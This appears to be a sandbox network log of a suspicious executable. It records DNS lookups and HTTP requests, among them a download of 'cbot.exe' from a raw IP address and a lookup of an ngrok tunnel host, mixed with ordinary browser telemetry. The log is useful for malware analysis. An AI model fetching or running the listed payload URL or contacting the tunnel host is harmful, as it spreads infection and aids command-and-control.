GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:03:34 GMT
Age: 99
X-Served-By: cache-fra-eddf8230087-FRA, cache-lon420138-LON
X-Cache: HIT, HIT
X-Cache-Hits: 216, 5
X-Timer: S1736791415.694444,VS0,VE0
Vary: Accept-Encoding
DNS

49.2.101.151.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

49.2.101.151.in-addr.arpa

IN PTR

Response
DNS

49.2.101.151.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

49.2.101.151.in-addr.arpa

IN PTR

Response
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.2.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:03:39 GMT
Age: 103
X-Served-By: cache-fra-eddf8230087-FRA, cache-lon420093-LON
X-Cache: HIT, HIT
X-Cache-Hits: 216, 1
X-Timer: S1736791419.209578,VS0,VE1
Vary: Accept-Encoding
DNS

beacons.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

142.250.179.163
DNS

beacons.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

142.250.179.163
POST

https://beacons.gcp.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

142.250.179.163:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 1052
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

163.179.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

163.179.250.142.in-addr.arpa

IN PTR

Response

163.179.250.142.in-addr.arpa

IN PTR

ams15s41-in-f31e100net
DNS

google.com

NetworkService

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
DNS

google.com

NetworkService

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
POST

https://google.com/domainreliability/upload

chrome.exe

Remote address:

142.250.180.14:443

Request

POST /domainreliability/upload HTTP/2.0
host: google.com
content-length: 812
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

e2c48.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c48.gcp.gvt2.com

IN A

Response

e2c48.gcp.gvt2.com

IN A

35.206.35.210
DNS

e2c48.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c48.gcp.gvt2.com

IN A

Response

e2c48.gcp.gvt2.com

IN A

35.206.35.210
DNS

14.180.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

14.180.250.142.in-addr.arpa

IN PTR

Response

14.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f141e100net
DNS

beacons.gvt2.com

NetworkService

Remote address:

8.8.8.8:53

Request

beacons.gvt2.com

IN A

Response

beacons.gvt2.com

IN A

142.250.179.163
DNS

beacons.gvt2.com

NetworkService

Remote address:

8.8.8.8:53

Request

beacons.gvt2.com

IN A

Response

beacons.gvt2.com

IN A

142.250.179.163
POST

https://e2c48.gcp.gvt2.com/nel/

chrome.exe

Remote address:

35.206.35.210:443

Request

POST /nel/ HTTP/2.0
host: e2c48.gcp.gvt2.com
content-length: 280
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Mon, 13 Jan 2025 18:04:04 GMT
DNS

210.35.206.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

210.35.206.35.in-addr.arpa

IN PTR

Response

210.35.206.35.in-addr.arpa

IN PTR

2103520635bcgoogleusercontentcom
DNS

210.35.206.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

210.35.206.35.in-addr.arpa

IN PTR

Response

210.35.206.35.in-addr.arpa

IN PTR

2103520635bcgoogleusercontentcom
POST

https://beacons.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

142.250.179.163:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gvt2.com
content-length: 280
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

google.co.uk

chrome.exe

Remote address:

8.8.8.8:53

Request

google.co.uk

IN A

Response

google.co.uk

IN A

172.217.169.3
DNS

google.co.uk

chrome.exe

Remote address:

8.8.8.8:53

Request

google.co.uk

IN A

Response

google.co.uk

IN A

172.217.169.3
POST

https://beacons.gcp.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

142.250.179.163:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 303
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
POST

https://google.co.uk/domainreliability/upload

chrome.exe

Remote address:

172.217.169.3:443

Request

POST /domainreliability/upload HTTP/2.0
host: google.co.uk
content-length: 302
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

e2c46.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c46.gcp.gvt2.com

IN A

Response

e2c46.gcp.gvt2.com

IN A

35.215.235.162
DNS

e2c46.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c46.gcp.gvt2.com

IN A

Response

e2c46.gcp.gvt2.com

IN A

35.215.235.162
POST

https://e2c46.gcp.gvt2.com/nel/

chrome.exe

Remote address:

35.215.235.162:443

Request

POST /nel/ HTTP/2.0
host: e2c46.gcp.gvt2.com
content-length: 267
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Mon, 13 Jan 2025 18:04:11 GMT
DNS

e2c1.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c1.gcp.gvt2.com

IN A

Response

e2c1.gcp.gvt2.com

IN A

34.80.89.126
DNS

e2c1.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

e2c1.gcp.gvt2.com

IN A

Response

e2c1.gcp.gvt2.com

IN A

34.80.89.126
DNS

3.169.217.172.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

3.169.217.172.in-addr.arpa

IN PTR

Response

3.169.217.172.in-addr.arpa

IN PTR

lhr25s26-in-f31e100net
DNS

162.235.215.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

162.235.215.35.in-addr.arpa

IN PTR

Response

162.235.215.35.in-addr.arpa

IN PTR

16223521535bcgoogleusercontentcom
DNS

162.235.215.35.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

162.235.215.35.in-addr.arpa

IN PTR

Response

162.235.215.35.in-addr.arpa

IN PTR

16223521535bcgoogleusercontentcom
POST

https://e2c1.gcp.gvt2.com/nel/

chrome.exe

Remote address:

34.80.89.126:443

Request

POST /nel/ HTTP/2.0
host: e2c1.gcp.gvt2.com
content-length: 276
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Mon, 13 Jan 2025 18:04:11 GMT
DNS

126.89.80.34.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

126.89.80.34.in-addr.arpa

IN PTR

Response

126.89.80.34.in-addr.arpa

IN PTR

126898034bcgoogleusercontentcom
DNS

126.89.80.34.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

126.89.80.34.in-addr.arpa

IN PTR

Response

126.89.80.34.in-addr.arpa

IN PTR

126898034bcgoogleusercontentcom
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.66.49
DNS

49.130.101.151.in-addr.arpa

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

49.130.101.151.in-addr.arpa

IN PTR

Response
DNS

0.tcp.in.ngrok.io

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
DNS

42.192.213.154.in-addr.arpa

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

42.192.213.154.in-addr.arpa

IN PTR

Response
DNS

42.192.213.154.in-addr.arpa

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

42.192.213.154.in-addr.arpa

IN PTR

Response
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.130.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 635341
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 18:00:40 GMT
ETag: "9b1cd-62b9a38e8e0c3"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 18:06:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 18:04:23 GMT
Age: 147
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600031-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 191, 22
X-Timer: S1736791463.301580,VS0,VE0
Vary: Accept-Encoding
GET

http://154.213.192.42/cbot.exe

._cache_New Text Document mod.exe

Remote address:

154.213.192.42:80

Request

GET /cbot.exe HTTP/1.1
Host: 154.213.192.42
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 18:04:34 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 13 Jan 2025 13:07:32 GMT
ETag: "6000-62b96209703b2"
Accept-Ranges: bytes
Content-Length: 24576
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

firefox-api-proxy.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
GET

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

firefox.exe

Remote address:

34.149.97.1:443

Request

GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
host: firefox-api-proxy.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
consumer_key: 94110-6d5ff7a89d72c869766af0e0
if-none-match: W/"497f-4L+T4r1ptqRsEJOcAlGl0gfViQw"
te: trailers
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

52.41.23.50

shavar.prod.mozaws.net

IN A

44.235.50.64

shavar.prod.mozaws.net

IN A

44.233.129.8
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
GET

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

firefox.exe

Remote address:

34.117.121.53:443

Request

GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
host: firefox-settings-attachments.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

50.23.41.52.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

50.23.41.52.in-addr.arpa

IN PTR

Response

50.23.41.52.in-addr.arpa

IN PTR

ec2-52-41-23-50 us-west-2compute amazonawscom
DNS

50.23.41.52.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

50.23.41.52.in-addr.arpa

IN PTR

Response

50.23.41.52.in-addr.arpa

IN PTR

ec2-52-41-23-50 us-west-2compute amazonawscom
DNS

1.97.149.34.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

1.97.149.34.in-addr.arpa

IN PTR

Response

1.97.149.34.in-addr.arpa

IN PTR

19714934bcgoogleusercontentcom
DNS

1.97.149.34.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

1.97.149.34.in-addr.arpa

IN PTR

Response

1.97.149.34.in-addr.arpa

IN PTR

19714934bcgoogleusercontentcom
DNS

beacons.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

142.250.187.195
DNS

drive.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
DNS

drive.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
GET

https://drive.google.com/

firefox.exe

Remote address:

172.217.169.78:443

Request

GET / HTTP/2.0
host: drive.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN AAAA

Response

drive.google.com

IN AAAA

2a00:1450:4009:819::200e
DNS

drive.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN AAAA

Response

drive.google.com

IN AAAA

2a00:1450:4009:819::200e
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
GET

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

firefox.exe

Remote address:

142.251.173.84:443

Request

GET /ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1 HTTP/2.0
host: accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN AAAA

Response

accounts.google.com

IN AAAA

2a00:1450:400c:c1f::54
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN AAAA

Response

accounts.google.com

IN AAAA

2a00:1450:400c:c1f::54
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/intl/en-US/drive/

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /intl/en-US/drive/ HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

workspace.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
DNS

workspace.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
GET

https://workspace.google.com/intl/en-US/products/drive/

firefox.exe

Remote address:

142.250.200.46:443

Request

GET /intl/en-US/products/drive/ HTTP/2.0
host: workspace.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
upgrade-insecure-requests: 1
sec-fetch-dest: document
